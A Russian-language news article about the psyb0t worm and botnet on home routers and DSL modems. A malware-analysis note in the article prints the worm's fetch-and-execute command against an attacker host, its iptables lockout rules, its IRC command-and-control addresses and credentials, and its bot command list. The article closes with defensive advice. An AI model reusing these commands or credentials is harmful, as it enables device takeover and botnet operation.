|
|
|
|
|
|
|
Эпидемия вируса для роутеров и DSL-модемов. |
| Главная / О компании |
Cерьезную опасность обнаружили администраторы сайта DroneBL. Примерно две недели назад на сайт была совершена DDoS-атака. При расследовании инцидента выяснилось, что атаку производили зараженные роутеры и DSL-модемы. Дальнейший анализ показал, что в Интернете появилась первая ботнет-сеть, которая базируется не на ПК и серверах, а на сетевом оборудовании домашнего уровня. Эта вредоносная сеть вместе с червем, распространяющим заразу, получила название «psyb0t».
Механизм заражения «psyb0t» оказался довольно необычным. Заражению подвержены любые устройства с маршрутизацией пакетов на базе операционной системы Linux Mipsel, снабженные административным интерфейсом, либо открывающие доступ через службы sshd или telnetd для демилитаризованной зоны DMZ, если у них заданы слабые сочетания имени пользователя и пароля (включая устройства openwrt/dd-wrt). Червь «psyb0t» использует алгоритм подбора имен пользователя и паролей, а также несколько стратегий для перехвата управления устройством.
После заражения червь «psyb0t» встраивает фрагмент вредоносного кода в операционную систему устройства – в состав червя входят варианты кода для нескольких версий системы Mipsel, они загружаются с центрального сервера злоумышленников. Затем червь закрывает конечному пользователю доступ к устройству по telnet, sshd и через веб-интерфейс, а сам начинает исследовать все проходящие через устройство пакеты, выуживая из них различные имена и пароли. Также червь пересылает своим владельцам информацию о наличии в локальной сети серверов с уязвимыми конфигурациями службы phpMyAdmin и СУБД MySQL. По данным DroneBL, уже сейчас в ботнет-сети насчитывается более 100 тысяч активных зараженных устройств, используемых для похищения частной информации и проведения крупномасштабных DDoS-атак. Особую опасность, по мнению первооткрывателей, представляет то, что большинство домашних пользователей, скорее всего, не смогут заметить присутствия червя «psyb0t» в своей сети.
Не успело подробное описание червя появиться в блоге DroneBL, как поступила новая информация автора psyb0t. Он уверяет, что написал червя с исследовательскими целями и теперь прекращает дальнейшую работу над ним. Также он уверяет, что сумел захватить порядка 80 000 устройств, но никогда не использовал этот ботнет для DDoS-атак, фишинга или кражи личных данных.
Примечание paxlo:
После попадания в систему, сифилис использует следующую стратегию:
1) Запускает shell через имеющийся CLI.
cli> shell
2) Удаляет файл udhcpc.env.
# rm -f /var/tmp/udhcpc.env
3) Закачивает эксплоит, сохраняет его вместо удалённого файла и запускает:
# wget http://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp &&
chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &
4) В целях собственной безопасности червь использует встроенный в железку firewall (iptables),
блокируя доступ к портам через которые она управляется (telnet, ssh, web).
# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP
Для управления зараженными устройствами используется протокол IRC.
После заражения устройство пытается подключится к запаролленому IRC серверу (командный центр) и ждет оттуда инструкций.
"Командным центром" червя, с которого происходят все запросы на управление бот сетью, является домен strcpy.us.to.
IP адреса:
202.71.102.110 (Малайзия)
202.67.218.33 (Гонг-Конг)
216.199.217.170 (США)
207.155.1.5 (США)
Порт подключения: 5050
Пароль: $!0@
Канал: #mipsel
Ключ: %#8b
Ник подключившегося начинается на [NIP] далее идет случайня последовательность. Например [NIP]-IBM6N4SKA.
Теперь злоумышленникам достаточно подать нужную команду в IRC для дальшнейших действий со стороны железок.
Список наиболее интересных команд:
.login - залогиниться в ботнете
.logout - вылогиниться
.exit - вылогиниться из ботнета и удалиться с железки
.sh - запустить шелл
.tlist - вывести список процессов
.kill - убить процесс
.killall - убить все текущие процессы
.silent - перестать посылать данные в канал
.getip - показать WAN IP бота
.visit - атаковать URL используя GET запросы
.scan - сканировать диапазон адресов на потенциальную уязвимость
.rscan - сканировать CIDR диапазон на потенциальную уязвимость
.lscan - тоже для что и .scan, но для локальной сети
.lrscan - тоже для что и .rscan, но для локальной сети
.sql - сканировать MySQL сервер на на уязвимости
.pma - сканировать phpMyAdmin на на уязвимости
.sleep - даёт команду боту приостановить деятельность
.upgrade - обновить червя с сайта распространителя
.ver - возвращает версию червя
.rs - получить обнаруженные логины и ссылки на rapidshare
.rsgen - сгенерировать ложную рапидную ссылку и отправить пользователю в браузер
.wget - скачать ссылку
.r00t - пробовать повысить локальные привилегии до рута используя эксплоит vmsplice
.sflood - послать SYN пакет на IP
.uflood - послать UDP пакет на IP
.iflood - послать ICMP пакет на IP
.pscan - сканировать порты на указанном IP
.fscan - подбор паролей на FTP сервисе указанного IP
Самый простой и действенный метод защиты от данного червя - вернуть устройство к заводским настройкам (HARD RESET), залить последнюю версию прошивки, НИ В КОЕМ СЛУЧАЕ не использовать заводские логин:пароль для администрирования железки, а использовать криптостойкие пароли (желательно более 8 символов, символы A-Z, a-z, 0-9, спецсимволы). Также необходимо по возможности отключить порты 21, 22 и WEB консоль со стороны WAN.
Возврат к списку новостей |
|
|
|
| |
|
|
|
|
| © АО «ЦЕНТРОН», 2007 - 2037.
|
|
